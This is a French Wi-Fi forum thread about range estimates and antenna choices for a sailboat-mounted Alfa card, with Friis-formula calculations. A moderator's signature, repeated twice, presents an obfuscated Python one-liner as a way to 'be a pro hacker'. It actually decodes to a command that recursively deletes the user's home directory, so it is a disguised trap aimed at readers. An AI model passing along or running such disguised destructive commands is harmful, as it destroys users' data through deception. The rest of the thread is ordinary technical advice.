Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 03-12-2012 19:40:09

steph06
Membre Indétronable
Site Web

antenne omni en haut de mât de voilier

Bonjour,

Par rapport au jour où je me suis inscrit sur ce forum, aujourd'hui j'en connais relativement + sur le sujet (tout est relatif hein ;-) ).
Donc les notions de sensibilité, puissance, débits, environnement, etc, me sont relativement un peu moins inconnue.

Côté pratique, là aussi je me suis légèrement amélioré (légèrement).

Mais .... sur une installation concrète dans un domaine précis il me manque des connaissances "de terrain" (expérience) pour anticiper.

D'ici quelque temps, je vais passer pas mal de temps sur un voilier.
J'aurai la possibilité de mettre en tête de mât une antenne omni et une carte WiFi dans un boitier étanche.

Ce que je possède à ce jour (mais qui peut évoluer) c'est :
- Alfa AWUS036H
- antenne omni 9dbi livrée avec
- antenne omni extérieur 8dbi DLINK ANT24-0800

1ere question :
En supposant que je mette ma carte + antenne en haut du mât (à 12 mètres), et que je fasse descendre un cable USB, vous pensez que ça capte les *Box (Live, Free, SFR, etc) à jusqu'à quelle distance ?
(évidemment que ça dépend du nombre de murs qui entourent la *box, mais c'est pour me faire une idée)

2e question :
Idem précédemment, mais en supposant que je mette une bien meilleure antenne omni (laquelle), et éventuellement (pas sûr que ça ait un intérêt) un amplificateur de signaux émis.

J'ai vraiment du mal à me faire une idée de distance. 500m ? 1000m? 3000m ? 5000m ?....
(j'ai bien dit "à la louche", juste pour me faire une idée ...)

Merci.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 03-12-2012 20:07:44

spawn
Modérateur

Re : antenne omni en haut de mât de voilier

Tu aurais trop de pertes avec un câble USB. Dans ta configuration, le mieux est une antenne directionnelle sur le pont qui te sert à viser la côte. Et puis tu sais, sur la côte atlantique, dans la plupart des ports (en vendée en tout cas) il y a un hotspot de dingue qui porte super loin sur chaque port de plaisance.

C'est mon avis, mais je pense que n'importe quel armateur pourra te renseigner (:

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 03-12-2012 20:11:10

steph06
Membre Indétronable
Site Web

Bon .... le coup du "il  a un hotspot de dingue qui porte super loin sur chaque port de plaisance", ça je ne savais pas : merci

Par contre le coup de l'antenne directionnelle : on oublie.
J'ai bien dit : antenne omni  (obligatoire)

Ensuite, à partir du moment où l'antenne se trouve en haut du mât, il y a deux possibilités :
1) un long cable coax
2) un long cable USB

Je pense que le choix est vite vu pour des raisons de pertes : ça sera cable usb

#4 03-12-2012 21:59:50

antares145
Membre d'honneur
Site Web

Salut ! On va diviser la question en deux parties : quelle est la portée, et comment mettre tout ça en place smile

Pour la portée, on peut calculer le meilleur cas mais en fonction des pertes que tu auras (difficile à estimer d'ailleurs), tu pourras avoir beaucoup moins que ça. Mais au moins tu auras une borne supérieure wink
On va utiliser la formule de Friis avec les données suivantes :
- une box qui émet à Pt=20 dBm avec son antenne intégrée de Gt=2 dBi
- une Alfa AWUS036H et une antenne omni de Gr=10 dBi (pour faire simple)

Pr = Pt + Gt + Gr - 20*log(4*3,14*D/0,12) - Pertes

Pour avoir une connexion correcte, on va dire qu'on veut une puissance reçue d'au moins -70 dBm, ça sera notre valeur Pr. On peut donc isoler la distance D dans la formule ci-dessus avec les valeurs suivantes :

Pr = -70 dBm
Pt = 20 dBm
Gt = 2 dBi
Gr = 10 dBi
Pertes = 0 (pour le meilleur cas)

On arrive à une distance de ~1200 mètres, donc tes 5 km tu peux oublier big_smile En fait, même un kilomètre à ta place j'oublierais, on parle ici du cas idéal, sans aucune perte ! Rien qu'avec les murs et les pertes diverses, tu peux encore retirer une vingtaine de dB au mieux. Tu peux gagner un peu en poussant l'Alfa au delà des 20 dBm réglementaires (t'es déjà hors-la-loi avec 20 dBm et une antenne de 10 dB, ça fait une PIRE de 30 dBm), mais ça fera pas une différence énorme. C'est ce qui arrive quand on veut absolument jouer avec des omnis des deux côtés wink Bon, si ce que dit Spawn est exact, t'auras ptet de la chance !

Pour ce qui est de la réalisation pratique, 12 mètres de câble, que ce soit coax ou USB, ça va être chaud... En coax t'auras des pertes considérables, et en USB la longueur maximale conseillée (sans répéteur) c'est 5 mètres. Bon, tu peux en mettre plusieurs bout à bout, mais tu risques d'être à court de puissance en bout de ligne situ veux envoyer la sauce au niveau de l'Alfa (et une alimentation aléatoire est le meilleur moyen d'avoir des bugs non-explicables). Admettons qu'on part sur de l'USB, mais si tu sais réduire la hauteur ça vaut sans doute mieux.

L'antenne, tu peux utiliser celle que tu as déjà (surtout la D-Link), mais ça vaut peut-être la peine de considérer une antenne de type "marine" : en mer, l'antenne est soumise à des contraintes particulières (eau, soleil, sel), donc si on veut qu'elle tienne le coup il lui faut un traitement spécial. Bon, ces antennes dont fort chères donc c'est peut-être pas compatible avec ton budget, mais c'est une option à considérer.

Je plussoie Spawn, une antenne directionnelle et un câble USB de longueur réduite te donneraient sans doute de meilleurs résultats tongue

#5 03-12-2012 22:29:23

steph06
Membre Indétronable
Site Web

Bon ! ... Cool .... J'ai une ordre d'idée de grandeur(-max) : merci ! :-)

- Chez Maxondes il y a une antenne omni de 22dbi (soit-disant idéale pour le mât d'un voilier), t'en penses quoi ?
- un ampli d'1 W (ou de 2W ou +), on est d'accord que ça va pas grandement changer la donne ?

Une petite explication à mon entêtement "antenne omni" :
* Un voilier ça bouge, ça gite : essaye de viser avec la houle et on en reparle ;-)
* qui dit "non-omni", implique de devoir repositionner l'antenne à chaque fois qu'on a besoin d'une connexion (et ça c'est chiant)

A la limite ... j'ai bien dit "à la limite" .... ça pourrait peut-être s'envisager une "sectorielle". Un truc qui rayonne à + de 90°.
Ca nécessitera évidemment de devoir repositionner l'antenne à chaque utilisation ......
... et d'une pierre deux coup on évitera de la mettre tout en haut du mât (forcément) et donc la longueur de câble.

Ca donne quoi l'ordre de grandeur avec une super-magnifique-antenne qui rayonne à 90° ?

(je dis "90°" mais ça peut être différent ... je veux juste éviter le truc à 30 ou 40° qui demandera de "bien viser" alors que ça bouge pas mal)

#6 04-12-2012 01:10:44

antares145
Membre d'honneur
Site Web

syeph06 a écrit :

- Chez Maxondes il y a une antenne omni de 22dbi (soit-disant idéale pour le mât d'un voilier), t'en penses quoi ?

Si tu ne me donnes pas de lien, la seule chose que je peux te dire c'est "j'en sais rien" wink
(sauf que 22 dBi en omni c'est du bullshit de gros calibre)

- un ampli d'1 W (ou de 2W ou +), on est d'accord que ça va pas grandement changer la donne ?

Mmmh, ça dépend du modèle, mais j'y crois pas trop. Si on oublie l'aspect légal, la plupart proposent 10-12 dB de gain en réception, donc sur le papier ça peut remplacer une antenne directionnelle (qui te donnerait un gain de cet ordre-là); Après, y a pas de miracle, ça va probablement amplifier le bruit aussi, et tu risques de saturer le récepteur en face. Je suis pas franchement optimiste par rapport à cette solution hmm

Tu pourrais regarder pour une Bi-quad, elle a un gain de l'ordre de 15 dBi pour une ouverture de ~180°, juste histoire de pas dissiper de la puissance vers le large où ça sert d'office à rien big_smile

Si tu veux voir ce que ça change, il te suffit de remplacer le "Gr=10" de l'omni dans l'exemple précédent par "Gr=15". Ca ne fera pas une différence fondamentale, mais en pratique c'est mieux (parce que l'ouverture de la biquad convient mieux que l'angle d'une pseudo-omni à 10 dBi, que tu devras quand même pointer wink).

#7 04-12-2012 01:16:26

steph06
Membre Indétronable
Site Web

antares145 a écrit :
syeph06 a écrit :

Si tu ne me donnes pas de lien, la seule chose que je peux te dire c'est "j'en sais rien" wink
(sauf que 22 dBi en omni c'est du bullshit de gros calibre)

rectifions rectifions :
=> http://www.maxondes.fr/detail_produit.p … wifi&id=20

#8 04-12-2012 04:51:17

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

antares145 a écrit :

Bon, si ce que dit Spawn est exact, t'auras ptet de la chance !

Il confond avec les phares lol

Possible pour la navigation de plaisance.

#9 04-12-2012 07:30:10

spawn
Modérateur

"Il confond avec les phares" big_smile

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#10 10-12-2012 10:10:41

steph06
Membre Indétronable
Site Web

antares145 a écrit :

Salut ! On va diviser la question en deux parties : quelle est la portée, et comment mettre tout ça en place smile

Pour la portée, on peut calculer le meilleur cas mais en fonction des pertes que tu auras (difficile à estimer d'ailleurs), tu pourras avoir beaucoup moins que ça. Mais au moins tu auras une borne supérieure wink
On va utiliser la formule de Friis avec les données suivantes :
- une box qui émet à Pt=20 dBm avec son antenne intégrée de Gt=2 dBi
- une Alfa AWUS036H et une antenne omni de Gr=10 dBi (pour faire simple)

Pr = Pt + Gt + Gr - 20*log(4*3,14*D/0,12) - Pertes

Pour avoir une connexion correcte, on va dire qu'on veut une puissance reçue d'au moins -70 dBm, ça sera notre valeur Pr. On peut donc isoler la distance D dans la formule ci-dessus avec les valeurs suivantes :

Pr = -70 dBm
Pt = 20 dBm
Gt = 2 dBi
Gr = 10 dBi
Pertes = 0 (pour le meilleur cas)

On arrive à une distance de ~1200 mètres, donc tes 5 km tu peux oublier big_smile En fait, même un kilomètre à ta place j'oublierais, on parle ici du cas idéal, sans aucune perte !(...)

J'étais en train de re-regardais ça ....
.... et je me suis dit "décidemment, mes cours sur les antennes sont vraiment très loin et j'étais vraiment un cancre à l'époque dans cette matière ;-) " ...... (et je pense qu'avec le temps ça a empiré roll )

Je me pose maintenant la question dans l'autre sens :
Si l'émetteur et le récepteur ont les même caractéristiques (puissance d'émission, sensibilité, et antenne OMNI) qu'est-ce qu'il faut comme matériel pour espérer 11Km de portée ?

(oui je suis sensé pouvoir répondre à la question tout seul en voyant ta formule ...... mais en fait non roll )

On peut imaginer ça encore autrement , du style : sans mur, à vue, avec deux carte alfa 1W (des 036h), avec des antennes omni 22 dbi , dans la théorie ça porte à combien ?

(je me pose la question car en fait j'envisage d'équiper un ou plusieurs points ADSL avec du matériel adéquat histoire de nas pas être limité à juste 500 mètres)

Merci

Dernière modification par steph06 (10-12-2012 10:11:31)

#11 02-01-2013 22:36:54

steph06
Membre Indétronable
Site Web

En complément du topic (et je pense que ça le cloturera) , je viens de tomber sur un lien sympa

=> http://www.random-science-tools.com/ele … /friis.htm

Bien sûr c'est du *théorique* mais ça donne une idée ...

(d'ailleurs ça peut être une bonne idée d'épingler cette URL, ça évitera bien des ouvertures de topic)

Annonce